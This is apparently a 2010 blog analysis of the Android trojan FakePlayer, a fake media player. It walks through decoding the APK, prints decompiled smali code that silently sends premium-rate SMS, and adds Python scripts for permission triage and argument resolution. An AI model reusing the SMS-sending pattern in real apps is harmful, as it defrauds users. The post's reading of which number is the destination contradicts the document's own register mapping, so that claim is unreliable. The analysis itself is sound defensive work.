Analysis of Trojan-SMS.AndroidOS.FakePlayer.a

August 4, 2010  |  Jaime Blasco

Trojan-SMS.AndroidOS.FakePlayer.a is one of the first malicious programs detected on Android smartphones.

The program disguises itself as a media player application and starts sending SMS messages to premium-rate numbers without the user’s knowledge.

To analyze the .apk Android package we can use android-apktool (http://code.google.com/p/android-apktool/) to decode the application resources and study the program’s behaviour.

Let’s start decoding the resources with apktool:

pc201166154132:fakeplayer jaimeblasco$ apktool d RU.apk
I: Baksmaling…
I: Loading resource table…
I: Decoding resources…
I: Loading resource table from file: /Users/jaimeblasco/apktool/framework/1.apk
I: Copying assets and libs…

Apktool obtains the following files from the APK:

pc201166154132:fakeplayer jaimeblasco$ find ./
./
.//RU
.//RU/AndroidManifest.xml
.//RU/apktool.yml
.//RU/res
.//RU/res/drawable
.//RU/res/drawable/icon.png
.//RU/res/layout
.//RU/res/layout/main.xml
.//RU/res/values
.//RU/res/values/public.xml
.//RU/res/values/strings.xml
.//RU/smali
.//RU/smali/org
.//RU/smali/org/me
.//RU/smali/org/me/androidapplication1
.//RU/smali/org/me/androidapplication1/DataHelper$OpenHelper.smali
.//RU/smali/org/me/androidapplication1/DataHelper.smali
.//RU/smali/org/me/androidapplication1/HelloWorld.smali
.//RU/smali/org/me/androidapplication1/MoviePlayer.smali
.//RU/smali/org/me/androidapplication1/R$attr.smali
.//RU/smali/org/me/androidapplication1/R$drawable.smali
.//RU/smali/org/me/androidapplication1/R$layout.smali
.//RU/smali/org/me/androidapplication1/R$string.smali
.//RU/smali/org/me/androidapplication1/R.smali

If we open the file RU/AndroidManifest.xml we can see that the application requests the Android permission android.permission.SEND_SMS when it is installed.

<?xml version="1.0" encoding="UTF-8"?>
<manifest package="org.me.androidapplication1"
  xmlns:android="http://schemas.android.com/apk/res/android">
    <application android:icon="@drawable/icon">
        <activity android:label="Movie Player" android:name=".MoviePlayer">
            <intent-filter>
                <action android:name="android.intent.action.MAIN" />
                <category android:name="android.intent.category.LAUNCHER" />
            </intent-filter>
        </activity>
    </application>
    <uses-permission android:name="android.permission.SEND_SMS" />
</manifest>
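The mismatch between what the application claims to be (a movie player) and what it asks for (SEND_SMS) is the first triage signal an analyst looks for in a decoded manifest. As an added example, not code from the original post, the following Python script parses a manifest, lists the requested permissions, flags those that can cost the user money, and reports which activities are exposed in the launcher. The manifest text is a constructed copy of the one decoded above, and the set of "costly" permissions is our own choice, not an Android-defined category.

```python
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"

# Constructed copy of the decoded AndroidManifest.xml shown in the post.
MANIFEST_SAMPLE = """<?xml version="1.0" encoding="UTF-8"?>
<manifest package="org.me.androidapplication1"
  xmlns:android="http://schemas.android.com/apk/res/android">
    <application android:icon="@drawable/icon">
        <activity android:label="Movie Player" android:name=".MoviePlayer">
            <intent-filter>
                <action android:name="android.intent.action.MAIN" />
                <category android:name="android.intent.category.LAUNCHER" />
            </intent-filter>
        </activity>
    </application>
    <uses-permission android:name="android.permission.SEND_SMS" />
</manifest>
"""

# Permissions that let an app spend the user's money or read their messages.
# This list is an assumption for triage purposes, not an Android permission group.
COSTLY_PERMISSIONS = {
    "android.permission.SEND_SMS",
    "android.permission.CALL_PHONE",
    "android.permission.RECEIVE_SMS",
    "android.permission.READ_SMS",
}


def android_attr(elem, name):
    """Read an attribute from the android: namespace (e.g. android:name)."""
    return elem.get("{%s}%s" % (ANDROID_NS, name))


def triage_manifest(xml_text):
    """Return the package name, all requested permissions, the costly ones,
    and every activity reachable from the launcher as (label, class) pairs."""
    root = ET.fromstring(xml_text.encode("utf-8"))
    perms = [android_attr(e, "name") for e in root.findall("uses-permission")]
    launchers = []
    for act in root.iter("activity"):
        for f in act.findall("intent-filter"):
            cats = {android_attr(c, "name") for c in f.findall("category")}
            if "android.intent.category.LAUNCHER" in cats:
                launchers.append((android_attr(act, "label"), android_attr(act, "name")))
    flagged = sorted(p for p in perms if p in COSTLY_PERMISSIONS)
    return {
        "package": root.get("package"),
        "permissions": perms,
        "flagged": flagged,
        "launchers": launchers,
    }


if __name__ == "__main__":
    report = triage_manifest(MANIFEST_SAMPLE)
    print("package:    ", report["package"])
    print("permissions:", report["permissions"])
    print("flagged:    ", report["flagged"])
    for label, cls in report["launchers"]:
        print("launcher:   ", label, "->", cls)
```

Run against a whole corpus of decoded APKs, the interesting output is any package whose launcher label suggests media, games or utilities while its flagged list is non-empty; for this sample the only requested permission is also the only flagged one.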



We observe that the application performs some SQLite operations in RU/smali/org/me/androidapplication1/DataHelper$OpenHelper.smali:

# static fields
.field private static final DATABASE_NAME:Ljava/lang/String; = "movieplayer.db"

.field private static final DATABASE_VERSION:I = 0x1

.field private static final INSERT:Ljava/lang/String; = "insert into table1(was) values ('was')"

.field private static final TABLE_NAME:Ljava/lang/String; = "table1"

The interesting operations can be found in RU/smali/org/me/androidapplication1/HelloWorld.smali:

    .line 28
    .local v0, m:Landroid/telephony/SmsManager;
    const-string v1, "3353"

    .line 29
    .local v1, destination:Ljava/lang/String;
    const-string v3, "798657"

    .line 31
    .local v3, text:Ljava/lang/String;
    const/4 v2, 0x0

    const/4 v4, 0x0

    const/4 v5, 0x0

    :try_start_0
    invoke-virtual/range {v0 .. v5}, Landroid/telephony/SmsManager;->sendTextMessage(Ljava/lang/String;Ljava/lang/String;Ljava/lang/String;Landroid/app/PendingIntent;Landroid/app/PendingIntent;)V
    :try_end_0
    .catch Ljava/lang/Exception; {:try_start_0 .. :try_end_0} :catch_0

    .line 37
    :goto_0
    const-string v1, "3354"

    .line 39
    const/4 v2, 0x0

    const/4 v4, 0x0

    const/4 v5, 0x0

    :try_start_1
    invoke-virtual/range {v0 .. v5}, Landroid/telephony/SmsManager;->sendTextMessage(Ljava/lang/String;Ljava/lang/String;Ljava/lang/String;Landroid/app/PendingIntent;Landroid/app/PendingIntent;)V
    :try_end_1
    .catch Ljava/lang/Exception; {:try_start_1 .. :try_end_1} :catch_1

The application uses the sendTextMessage function from the Android API:


public final void sendTextMessage(String destinationAddress, String scAddress, String text, PendingIntent sentIntent, PendingIntent deliveryIntent)

So the malicious program tries to send SMS messages to destination 798657 using the service centre addresses (SMSC) 3353 and 3354.

As we can see, this is a very simple piece of malware: it has no self-spreading capability, and the risk is low because it was never distributed through the Android Market.
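In an invoke-virtual/range call the registers map onto the Java signature in order: v0 holds the SmsManager receiver and v1 to v5 hold the five parameters of sendTextMessage in turn, so matching registers to parameters is mechanical. As an added example, not code from the original post or from the malware, the following Python script walks a smali method body, remembers the last constant loaded into each register, and reports the resolved arguments at every sendTextMessage call site. The smali input is a constructed excerpt modelled on the HelloWorld.smali listing above, and the short-code heuristic is our own assumption for triage, not a carrier lookup.

```python
import re

# Constructed smali excerpt modelled on the HelloWorld.smali listing in the post
# (.line and .catch directives trimmed; register usage is kept as in the listing).
SMALI_SAMPLE = """\
    .local v0, m:Landroid/telephony/SmsManager;
    const-string v1, "3353"
    const-string v3, "798657"
    const/4 v2, 0x0
    const/4 v4, 0x0
    const/4 v5, 0x0
    :try_start_0
    invoke-virtual/range {v0 .. v5}, Landroid/telephony/SmsManager;->sendTextMessage(Ljava/lang/String;Ljava/lang/String;Ljava/lang/String;Landroid/app/PendingIntent;Landroid/app/PendingIntent;)V
    :try_end_0
    :goto_0
    const-string v1, "3354"
    const/4 v2, 0x0
    const/4 v4, 0x0
    const/4 v5, 0x0
    :try_start_1
    invoke-virtual/range {v0 .. v5}, Landroid/telephony/SmsManager;->sendTextMessage(Ljava/lang/String;Ljava/lang/String;Ljava/lang/String;Landroid/app/PendingIntent;Landroid/app/PendingIntent;)V
    :try_end_1
"""

# Parameter names in the order given by the Android API signature quoted in the post.
SEND_TEXT_MESSAGE_PARAMS = ("destinationAddress", "scAddress", "text", "sentIntent", "deliveryIntent")
TARGET = "Landroid/telephony/SmsManager;->sendTextMessage"

CONST_STRING = re.compile(r'^\s*const-string(?:/jumbo)?\s+(v\d+),\s+"(.*)"\s*$')
CONST_INT = re.compile(r'^\s*const(?:/4|/16|/high16)?\s+(v\d+),\s+(-?0x[0-9a-fA-F]+|-?\d+)\s*$')
INVOKE = re.compile(r'^\s*invoke-(?:virtual|direct|static|interface)(/range)?\s+\{([^}]*)\},\s+(L[\w/$]+;->\w+)\(')


def _registers(range_form, reg_list):
    """Expand '{v0 .. v5}' (range form) or '{v0, v1, v2}' into a list of register names."""
    if range_form:
        first, last = (int(r.strip()[1:]) for r in reg_list.split(".."))
        return ["v%d" % i for i in range(first, last + 1)]
    return [r.strip() for r in reg_list.split(",") if r.strip()]


def is_short_code(address):
    """Heuristic (our assumption): premium-rate numbers are usually short, all-digit codes."""
    return isinstance(address, str) and address.isdigit() and len(address) <= 6


def resolve_sms_calls(smali_text):
    """Linear walk of a method body: track the last constant written to each register and
    report the arguments of every sendTextMessage call, keyed by the API parameter names."""
    regs = {}
    calls = []
    for line in smali_text.splitlines():
        m = CONST_STRING.match(line)
        if m:
            regs[m.group(1)] = m.group(2)
            continue
        m = CONST_INT.match(line)
        if m:
            regs[m.group(1)] = int(m.group(2), 0)
            continue
        m = INVOKE.match(line)
        if not m or m.group(3) != TARGET:
            continue
        args = _registers(m.group(1), m.group(2))[1:]  # drop v0, the SmsManager receiver
        call = {"target": TARGET}
        for name, reg in zip(SEND_TEXT_MESSAGE_PARAMS, args):
            value = regs.get(reg, "<unresolved>")
            # const/4 vN, 0x0 placed in a reference slot is Java null
            call[name] = None if value == 0 else value
        call["short_code_destination"] = is_short_code(call.get("destinationAddress"))
        calls.append(call)
    return calls


if __name__ == "__main__":
    for call in resolve_sms_calls(SMALI_SAMPLE):
        print(call)
```

Because register contents persist between the two call sites, v3 is loaded once and reused, which is why the second call only reloads v1. A linear walk like this is enough for straight-line code such as the listing above; methods that branch before the call need per-path tracking.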
